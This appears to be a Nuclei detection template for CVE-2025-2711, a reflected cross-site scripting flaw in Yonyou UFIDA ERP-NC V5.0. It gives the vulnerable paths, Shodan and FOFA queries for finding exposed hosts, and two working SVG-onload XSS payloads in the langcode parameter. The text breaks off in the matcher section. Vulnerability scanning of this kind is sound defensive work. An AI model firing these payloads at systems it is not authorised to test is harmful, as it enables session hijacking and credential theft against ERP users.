id: CVE-2025-2711 info: name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution. impact: | Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system. remediation: | Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the langcode parameter in help JSP files. reference: - https://github.com/Hebing123/cve/issues/86 - https://nvd.nist.gov/vuln/detail/CVE-2025-2711 classification: epss-score: 0.00835 epss-percentile: 0.52804 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-2711 cwe-id: CWE-79 cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: yonyou product: ufida_erp-nc fofa-query: icon_hash="1085941792" shodan-query: title:"用友" tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vuln http: - method: GET path: - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E" - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '